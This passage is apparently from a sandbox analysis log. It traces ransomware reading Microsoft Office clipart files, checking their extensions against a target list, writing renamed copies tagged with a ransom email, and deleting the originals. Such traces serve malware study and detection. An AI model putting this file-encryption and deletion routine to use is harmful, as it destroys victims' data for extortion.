(hObject=0x390) returned 1 [0273.118] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.119] SetEndOfFile (hFile=0x37c) returned 1 [0273.121] CloseHandle (hObject=0x37c) returned 1 [0273.122] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.124] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf")) returned 1 [0273.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0273.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0273.124] lstrlenW (lpString=".doc") returned 4 [0273.124] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.124] lstrlenW (lpString=".docx") returned 5 [0273.124] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.124] lstrlenW (lpString=".pdf") returned 4 [0273.124] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.124] lstrlenW (lpString=".xls") returned 4 [0273.124] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.124] lstrlenW (lpString=".xlsx") returned 5 [0273.124] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.124] lstrlenW (lpString=".ppt") returned 4 [0273.124] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0273.125] lstrlenW (lpString=".zip") returned 4 [0273.125] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.125] lstrlenW (lpString=".rar") returned 4 [0273.125] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.125] lstrlenW (lpString=".bz2") returned 4 [0273.125] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.125] lstrlenW (lpString=".7z") returned 3 [0273.125] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0273.125] lstrlenW (lpString=".dbf") returned 4 [0273.125] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0273.125] lstrlenW (lpString=".1cd") returned 4 [0273.125] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0273.125] lstrlenW (lpString=".jpg") returned 4 [0273.125] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0273.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0273.125] lstrlenW (lpString=".doc") returned 4 [0273.125] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.125] lstrlenW (lpString=".docx") returned 5 [0273.125] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.125] lstrlenW (lpString=".pdf") returned 4 [0273.125] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.125] lstrlenW (lpString=".xls") returned 4 [0273.125] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.125] lstrlenW (lpString=".xlsx") returned 5 [0273.125] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.125] lstrlenW (lpString=".ppt") returned 4 [0273.125] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0273.125] lstrlenW (lpString=".zip") returned 4 [0273.125] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.125] lstrlenW (lpString=".rar") returned 4 [0273.125] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.125] lstrlenW (lpString=".bz2") returned 4 [0273.126] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.126] lstrlenW (lpString=".7z") returned 3 [0273.126] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0273.126] lstrlenW (lpString=".dbf") returned 4 [0273.126] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0273.126] lstrlenW (lpString=".1cd") returned 4 [0273.126] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0273.126] lstrlenW (lpString=".jpg") returned 4 [0273.126] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.126] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.126] lstrlenW (lpString="DD00449_.WMF") returned 12 [0273.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0273.139] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=9992) returned 1 [0273.139] CloseHandle (hObject=0x2cc) returned 1 [0273.139] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf")) returned 0x20 [0273.140] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0273.141] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.141] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0273.141] GetLastError () returned 0x0 [0273.141] ReadFile (in: hFile=0x2cc, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x2708, lpOverlapped=0x0) returned 1 [0273.143] WriteFile (in: hFile=0x2c4, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x2710, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x2710, lpOverlapped=0x0) returned 1 [0273.144] ReadFile (in: hFile=0x2cc, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.144] WriteFile (in: hFile=0x2c4, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.144] SetEndOfFile (hFile=0x2c4) returned 1 [0273.144] CloseHandle (hObject=0x2c4) returned 1 [0273.144] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.145] SetEndOfFile (hFile=0x2cc) returned 1 [0273.147] CloseHandle (hObject=0x2cc) returned 1 [0273.147] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.147] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf")) returned 1 [0273.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0273.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0273.147] lstrlenW (lpString=".doc") returned 4 [0273.147] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.147] lstrlenW (lpString=".docx") returned 5 [0273.147] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.147] lstrlenW (lpString=".pdf") returned 4 [0273.147] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.147] lstrlenW (lpString=".xls") returned 4 [0273.147] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.147] lstrlenW (lpString=".xlsx") returned 5 [0273.147] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.147] lstrlenW (lpString=".ppt") returned 4 [0273.147] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0273.148] lstrlenW (lpString=".zip") returned 4 [0273.148] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.148] lstrlenW (lpString=".rar") returned 4 [0273.148] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.148] lstrlenW (lpString=".bz2") returned 4 [0273.148] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.148] lstrlenW (lpString=".7z") returned 3 [0273.148] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0273.148] lstrlenW (lpString=".dbf") returned 4 [0273.148] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0273.148] lstrlenW (lpString=".1cd") returned 4 [0273.148] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0273.148] lstrlenW (lpString=".jpg") returned 4 [0273.148] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0273.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0273.148] lstrlenW (lpString=".doc") returned 4 [0273.148] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.148] lstrlenW (lpString=".docx") returned 5 [0273.148] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.148] lstrlenW (lpString=".pdf") returned 4 [0273.148] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.148] lstrlenW (lpString=".xls") returned 4 [0273.148] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.148] lstrlenW (lpString=".xlsx") returned 5 [0273.148] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.148] lstrlenW (lpString=".ppt") returned 4 [0273.148] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0273.148] lstrlenW (lpString=".zip") returned 4 [0273.148] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.148] lstrlenW (lpString=".rar") returned 4 [0273.149] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.149] lstrlenW (lpString=".bz2") returned 4 [0273.149] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.149] lstrlenW (lpString=".7z") returned 3 [0273.149] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0273.149] lstrlenW (lpString=".dbf") returned 4 [0273.149] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0273.149] lstrlenW (lpString=".1cd") returned 4 [0273.149] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0273.149] lstrlenW (lpString=".jpg") returned 4 [0273.149] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.149] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.149] lstrlenW (lpString="DD00687_.WMF") returned 12 [0273.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0273.149] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=20784) returned 1 [0273.149] CloseHandle (hObject=0x2cc) returned 1 [0273.149] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf")) returned 0x20 [0273.150] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0273.150] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.150] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0273.150] GetLastError () returned 0x0 [0273.150] ReadFile (in: hFile=0x2cc, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x5130, lpOverlapped=0x0) returned 1 [0273.153] WriteFile (in: hFile=0x2c4, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x5140, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x5140, lpOverlapped=0x0) returned 1 [0273.154] ReadFile (in: hFile=0x2cc, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.154] WriteFile (in: hFile=0x2c4, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.154] SetEndOfFile (hFile=0x2c4) returned 1 [0273.154] CloseHandle (hObject=0x2c4) returned 1 [0273.154] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.154] SetEndOfFile (hFile=0x2cc) returned 1 [0273.157] CloseHandle (hObject=0x2cc) returned 1 [0273.157] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.157] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00687_.wmf")) returned 1 [0273.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0273.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0273.157] lstrlenW (lpString=".doc") returned 4 [0273.157] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.157] lstrlenW (lpString=".docx") returned 5 [0273.157] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.157] lstrlenW (lpString=".pdf") returned 4 [0273.157] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.157] lstrlenW (lpString=".xls") returned 4 [0273.157] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.157] lstrlenW (lpString=".xlsx") returned 5 [0273.157] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.158] lstrlenW (lpString=".ppt") returned 4 [0273.158] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0273.158] lstrlenW (lpString=".zip") returned 4 [0273.158] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.158] lstrlenW (lpString=".rar") returned 4 [0273.158] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.158] lstrlenW (lpString=".bz2") returned 4 [0273.158] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.158] lstrlenW (lpString=".7z") returned 3 [0273.158] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0273.158] lstrlenW (lpString=".dbf") returned 4 [0273.158] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0273.158] lstrlenW (lpString=".1cd") returned 4 [0273.158] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0273.158] lstrlenW (lpString=".jpg") returned 4 [0273.158] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0273.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0273.158] lstrlenW (lpString=".doc") returned 4 [0273.158] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.158] lstrlenW (lpString=".docx") returned 5 [0273.158] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.158] lstrlenW (lpString=".pdf") returned 4 [0273.158] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.158] lstrlenW (lpString=".xls") returned 4 [0273.158] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.158] lstrlenW (lpString=".xlsx") returned 5 [0273.158] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.158] lstrlenW (lpString=".ppt") returned 4 [0273.158] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0273.158] lstrlenW (lpString=".zip") returned 4 [0273.158] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.159] lstrlenW (lpString=".rar") returned 4 [0273.159] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.159] lstrlenW (lpString=".bz2") returned 4 [0273.159] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.159] lstrlenW (lpString=".7z") returned 3 [0273.159] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0273.159] lstrlenW (lpString=".dbf") returned 4 [0273.159] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0273.159] lstrlenW (lpString=".1cd") returned 4 [0273.159] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0273.159] lstrlenW (lpString=".jpg") returned 4 [0273.159] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.159] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.159] lstrlenW (lpString="DD00705_.WMF") returned 12 [0273.159] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0273.159] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=24588) returned 1 [0273.159] CloseHandle (hObject=0x2cc) returned 1 [0273.159] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf")) returned 0x20 [0273.160] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.160] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0273.160] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.160] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.160] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0273.160] GetLastError () returned 0x0 [0273.160] ReadFile (in: hFile=0x2cc, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x600c, lpOverlapped=0x0) returned 1 [0273.866] WriteFile (in: hFile=0x2c4, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x6010, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x6010, lpOverlapped=0x0) returned 1 [0273.867] ReadFile (in: hFile=0x2cc, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.867] WriteFile (in: hFile=0x2c4, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.867] SetEndOfFile (hFile=0x2c4) returned 1 [0273.867] CloseHandle (hObject=0x2c4) returned 1 [0273.867] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.867] SetEndOfFile (hFile=0x2cc) returned 1 [0273.871] CloseHandle (hObject=0x2cc) returned 1 [0273.871] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.959] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf")) returned 1 